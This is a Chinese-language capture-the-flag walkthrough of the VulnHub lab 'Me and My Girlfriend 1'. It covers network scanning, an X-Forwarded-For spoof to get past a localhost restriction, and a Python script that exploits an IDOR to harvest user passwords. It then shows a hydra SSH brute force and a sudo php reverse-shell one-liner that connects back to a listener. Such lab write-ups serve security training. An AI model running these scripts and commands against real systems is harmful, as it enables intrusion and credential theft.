靶机测试 Me and My Girlfriend1笔记

靶机描述

Description: This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked at a private company, "Ceban Corp", something has changed from Alice's attitude towards Bob like something is "hidden", And Bob asks for your help to get what Alice is hiding and get full access to the company!

Difficulty Level: Beginner

Notes: there are 2 flag files

Learning: Web Application | Simple Privilege Escalation

靶机地址

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

靶机测试

信息收集

fscan确定靶机地址

 .\fscan64.exe -h 192.168.1.0/24

start infoscan
(icmp) Target 192.168.1.53    is alive
(icmp) Target 192.168.1.105   is alive
(icmp) Target 192.168.1.103   is alive
(icmp) Target 192.168.1.1     is alive
[*] Icmp alive hosts len is: 4
192.168.1.103:80 open
192.168.1.105:139 open
192.168.1.53:22 open
192.168.1.105:135 open
192.168.1.105:443 open
192.168.1.1:80 open
192.168.1.103:22 open
192.168.1.105:3306 open
192.168.1.105:445 open
192.168.1.105:7000 open
192.168.1.105:8000 open
192.168.1.105:7680 open

确定靶机地址192.168.1.103

nmap扫描

$ nmap -sT -sV -A 192.168.1.103 -oA me    

Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-08 17:34 CST
Nmap scan report for 192.168.1.103
Host is up (0.00034s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA)
|   2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA)
|   256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA)
|_  256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.64 seconds
zsh: segmentation fault  nmap -sT -sV -A 192.168.1.103 -oA me
                                                             

目录扫描

gobuster dir -u http://192.168.1.103 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

└─$ gobuster dir -u http://192.168.1.103/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                                                                                                    139 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.103/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/01/08 17:37:04 Starting gobuster in directory enumeration mode
===============================================================
/misc                 (Status: 301) [Size: 312] [--> http://192.168.1.103/misc/]
/config               (Status: 301) [Size: 314] [--> http://192.168.1.103/config/]
/server-status        (Status: 403) [Size: 293]                                   
Progress: 180146 / 220561 (81.68%)                                               ^C
[!] Keyboard interrupt detected, terminating.
                                                                                  
===============================================================
2023/01/08 17:37:24 Finished

绕过本地访问限制

访问主页发现有限制

用这个X-Forwarded-For Header插件 再增加上 127.0.0.1 即可绕过

平行越权漏洞

发现注册登录和注册页面 注册用户

点击个人信息查看源代码可以看见密码

修改id查看是否可以看到别人的密码

把id修改为1即可获取 id=1 用户的账号和密码

运行脚本保存用户

import requests
import re

def getUserInfo(id):
    headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36','x-forwarded-for': '127.0.0.1'}
    cookie={'PHPSESSID':'7mk2k1p77qr6t1gf9ba25k6hp5'}
    r = requests.get(url="http://192.168.1.103/index.php?page=profile&user_id=%s"%id,headers=headers,cookies=cookie).text
    name=re.search('id="name\"\svalue="(.*?)">',r).group(1)
    username=re.search('username\"\svalue="(.*?)"',r).group(1)
    password=re.search('password\"\svalue="(.*?)"',r).group(1)
    return name,username,password
for i in range(15):
    name,username,password = getUserInfo(str(i))
    if name:
        print(username+":"+password)

hydra 穷举 ssh

把用户信息保存下来 再用 hydra 爆破 ssh
hydra -C userinfo ssh://192.168.1.103 

登录 ssh，得到 flag1.txt

特权提升

查看当前权限

sudo -l

发现 php 不需要密码就可以执行操作

php 反弹 shell

nc -lnvp 9001
sudo php -r '$sock=fsockopen("192.168.1.53",9001);exec("/bin/bash -i <&3 >&3 2>&3");'

获取flag2.txt

后来，错过也成了人间常态